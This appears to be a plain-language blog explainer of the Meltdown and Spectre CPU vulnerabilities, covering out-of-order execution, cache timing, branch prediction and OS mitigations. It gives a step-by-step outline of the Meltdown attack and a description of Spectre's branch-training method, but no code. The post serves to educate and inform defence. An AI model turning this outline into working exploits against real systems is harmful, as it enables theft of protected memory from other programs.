With the recent disclosure of the hardware bugs Meltdown and Spectre, the infosec world has been thrown into a bit of chaos. The bottom line is “It’s a very serious bug in the CPU itself; your computer is most probably affected, but the major operating systems are providing patches that mitigate the more serious issues. As always, update your OS to the latest version and you should be well-protected”.

But we were very interested in what’s going on at a technical level that allows the exploit. The researchers who discovered these vulnerabilities provided papers with very in-depth details of the attacks. But we know that not everyone has a few hours to dig through technical papers, so this post will attempt to explain the issue in as simple terms as we can, while still trying to give enough information to understand how it works. Forgive us if we over-simplify some of the technical details – if you’re interested in the nitty-gritty, the research papers go into much more detail, and are really quite interesting – well worth a read (if you’re into that sort of thing). But if you don’t have time to delve into all of that, here’s a quick technical summary of what’s happening.

The TLDR is this: Modern operating systems prevent the different programs on your computer from viewing each others’ data (so Microsoft Word can’t see what’s happening in the inner workings of Google Chrome). This isolation is an important security mechanism. Both Meltdown and Spectre break these protections in different ways; meaning that an attacker could view secret data for any program running on your computer. Both are bugs in the hardware itself, and affect CPUs going back to at least 2011; maybe further.

The Meltdown attack appears to be relatively easy to exploit, with severe impacts, but the major Operating Systems are providing patches to mitigate its more serious impacts. It affects Intel chips. The Spectre attack is more complicated to exploit, but will also be significantly harder to fix. It affects Intel, AMD and ARM chips.

Background

Modern CPUs have a novel feature called out-of-order execution, which makes them significantly more efficient. This feature means that if a program has to perform, say, three things in order (A, then B, then C), but they’re not logically dependent on each other, it might try to do them out-of-order for the sake of efficiency. So, for example, if step A is going to take a while, it will do steps B and C while it waits (rather than sitting idle for relatively large chunks of time).

However, if it is later discovered that step A had an error, such that steps B and C should never have been run, it throws away the results from those later steps, and pretends like it never happened; even though it actually did. This can feel a bit disconcerting at first: that we’re essentially “rewriting the past”. But CPUs have been doing this for years, and it has been considered to be very robust. The programs themselves have no idea that this is going on – as far as they are concerned, they are executing exactly as expected.

So let’s say that we try to access some data (in memory) that we shouldn’t have access to… like, for example, the Operating System’s privileged memory (kernel space). Logically, the program does the right thing: it prevents us from accessing it. In reality, though, out-of-order execution can treat the access check (“should I be allowed to access this memory?”) and the access itself (“what data is stored there?”) as separate, independent steps, which it could do in parallel. This means that the memory may actually be accessed, while it simultaneously checks whether or not the access should be allowed. Then, when it’s discovered that we shouldn’t have access to that memory, the CPU throws away the result of the memory access, pretending that we never accessed it. We’ll say that this last step is “undone”.

However, it turns out that doing this does actually has some side-effects; it leaves traces that it ran something that should never have run.

For instance, another feature of modern CPUs are caches, which hold a copy of some of the memory in your RAM; but are tens of times faster to access. When a chunk of memory is accessed for the first time, it’s put in this cache; and as a result, subsequent accesses to the same memory region are significantly faster. So much faster, in fact, that you can actually measure the difference. If a step is run that is later “undone”, any memory that it accessed may now be in the CPU’s cache; whereas, logically speaking, it shouldn’t be.

We should now have enough background information to understand the Meltdown attack.

Meltdown Attack

Meltdown Logo

The Meltdown attack relies on the ability to run our own code on a system; so it assumes that the attacker has already compromised a system, and is trying to read protected data (e.g. kernel memory). The steps for the attack are the following:

Setup the attack:

A) Allocate 256 pages of memory (256 * 4KB)
B) Force the CPU’s cache to be reset to a known state (Intel helpfully provides us with a way of doing just this, though there are other ways).

Perform the attack:

We pick a byte of memory that we want to read, and we:
C) Check that we’re allowed to read the byte of memory
D) If permission is granted, we read the byte of memory
E) If the byte’s value is a 1, then access page #1. If the byte’s value is a 2, then access page #2, etc.

Now why are we doing this series of complicated steps? Well, take a look at Step C. Let’s say we try to read some protected memory. The operating system will stop us… right?

Well, not quite. Because of out-of-order execution, the CPU may actually perform steps D and E while it’s waiting to find out whether we’re allowed to access the memory or not.

Let me say that again, because it’s the most important part of this exploit: If we try to access protected memory using these steps, then steps D and E should never, ever, run. But because CPUs try to be clever, they may actually just go ahead and do it while waiting to see what happened in step C.

Now once Step C completes, the CPU will realise that steps D and E should not have run, and it will “undo” the result, and continue on with the program as though they never did… but the damage is already done. By running step E, we’ve accessed one of our pages. As a result, that page is now in the CPU’s cache!

We can now perform a “timing attack” on the cache: We access each of our 256 pages, and time how long each access takes. Most of those accesses will be relatively slow, because it has to go all the way into RAM to look it up. But one (and only one) of those accesses will be extremely quick, because it’s in the cache (as a result of being accessed during step E).

So if (for example) we discover that the 155th page was accessed extremely quickly, we can reason that the value of the byte we tried to access (in step E) must have been 155. So even though we didn’t directly read protected memory, we’ve sneakily figured out what it is! This type of attack is known as a “side-channel attack”.

Using this approach, we can access every byte that a program has access to, which includes kernel memory. And because Operating Systems load other programs’ data into kernel memory, this means we can read other programs’ data too.

This even lets us break other isolation mechanisms such as containerisation. Since Docker containers share a kernel, it is possible to use this attack to read data from other containers.

The speed of this attack is surprisingly fast: the researchers report that they were able to read privileged memory at a rate of 503KB/s, with an error rate of only 0.02%.

Spectre Attack

Spectre Logo

The Spectre attack is quite a bit more complex, and exploits a different mechanism altogether, though is in many ways similar to this attack. It takes advantage of the way in which CPUs try to make more accurate guesses about what a computer program is about to do, so that it doesn’t have to undo its out-of-order execution as often.

As programs run, CPUs learn what commonly happens in a program, and use that information to make better guesses about what code to run out-of-order. So (in highly simplified terms), if a program is up to instruction #100, and it then jumps to instruction #120, the CPU will in future be more likely to predict this when performing out-of-order optimisations. (“Next time the program is up to instruction #100, let’s predict that it will now go to #120”). This feature is called Branch Prediction. For the more technical readers, when I talk about “instruction number”, I’m actually referring to virtual memory addresses of CPU instructions, but trying to keep it in layman’s terms.

Researchers noticed that this prediction behaviour was actually shared between separate programs; that is, the CPU doesn’t ever take note of which program it was that jumped from instruction #100 to instruction #120 – it just remembers that it happened “in some program or another”. So if it observes the above behaviour in Program A, when Program B gets to its own instruction #100, branch prediction in *that* program will also predict that it will go to instruction #120 – even if that should never actually be possible!

To create the Spectre attack, a hacker will first look at a victim program (for example, a web browser, or a password manager – something they want to steal data from). They look for what we call a “gadget”: a specific set of instructions that allows this attack to work (it’s a bit complicated – check the research papers if you want to get stuck into the details). Let’s say that they find such a “gadget” at instruction #150.

Now, they run up their own program. This attacking program first does a heap of instruction jumps; in this case from instruction #100 to instruction #150. The attacker’s aim here is to make the CPU’s branch prediction module think “Any time I see a program at instruction #100, I expect that it will then go to instruction #150”.

Now consider the victim program. When it gets to instruction #100, branch prediction will jump in and say “I expect that this program will now jump to instruction #150”. As a result, if it performs out-of-order execution, it will jump to the gadget at #150, before soon realising “Oh, my prediction was wrong”. But as with the Meltdown attack, the damage is already done.

But what damage?

Well, the gadget that the attacker uses is selected in such a way that it will cause a memory lookup during the out-of-order execution, which will cause the CPU cache to be modified. Then, as in the Meltdown attack, the attacking program can then detect this. In a sense, it uses part of the program against itself.

My first thought was that existing virtual memory randomisation mechanisms like ASLR should make the attack much harder to succeed, as it mixes up the instruction number (virtual memory address) each time a program is run, making the location of the gadget harder to predict. However, the researchers report that only lower-order memory bits are used for performing branch prediction; whereas ASLR only randomises higher-order bits.

We should note that because of the particular mechanism it exploits, Spectre attacks have to be much more specific than Meltdown; and must be performed on an application-by-application basis (e.g. a hacker wanting to attack, say, Google Chrome, must find a gadget inside Google Chrome, and craft an exploit that is specific to that program; which will not work against any other program; whereas the Meltdown attack is more of a one-size-fits-all attack).

What can be done about it?

Despite being a bug in the hardware, there are things that can be done at the software level to mitigate the issue. Something that significantly increases the impact of the Meltdown attack is that the kernel memory is immediately available to a program (“in its address space”); albeit protected. Because Meltdown bypasses this protection, this memory can be read. Linux, Windows and Mac OS X appear to be mitigating the issue by removing kernel memory from the program’s address space. This means that if programs want to do system calls (that is, actions that require kernel memory), it will take significantly longer to do so. Estimates range all the way up to a 30% slowdown for programs heavily reliant on system calls, though this is a worst-case, and most applications will likely be much less heavily affected than that.

For the Spectre attack, as it does not rely on reading kernel memory, the above-mentioned mitigations will not do anything to prevent such attacks. In fact, because Spectre must be exploited on an application-by-application basis, it (currently) must also be defended against on an application-by-application basis, as specific exploits are discovered. The simplest approach to stop such attacks is likely just to edit and recompile applications to remove gadgets that are discovered; but this “whack-a-mole” approach is not a great long-term strategy.

What happens from here?

This research opens an entirely new vector of attacks against software that is written according to all previously-known best practices. Unless a novel, general solution is found to defend against it, we would expect to see new exploits against common software over the coming years, as defending against it is very difficult, and requires an entirely new defensive mindset for software developers.

The implications for virtualised, containerised and cloud-based systems will also be interesting. Any system that runs on the same hardware as another system (as is common in these configurations) may be vulnerable to some similar attacks. The big cloud providers appear to be on the ball with the most significant of these issues, patching their systems against the Meltdown attack; but how much of an impact other similar attacks will have is still a question of research. In the meantime, until better fixes are in place, or more research is done, systems for which security is paramount must take into account the hardware they are running on; whether that be in the cloud, or on-premises: running on dedicated hardware to ensure that any sensitive data is truly isolated from other systems.

Ultimately, these issues will need to be addressed by the CPU manufacturers in question, though it remains to be seen how they will approach this problem. One thing is certain: a lot more security researchers will be looking into these types of attacks in the coming months and years.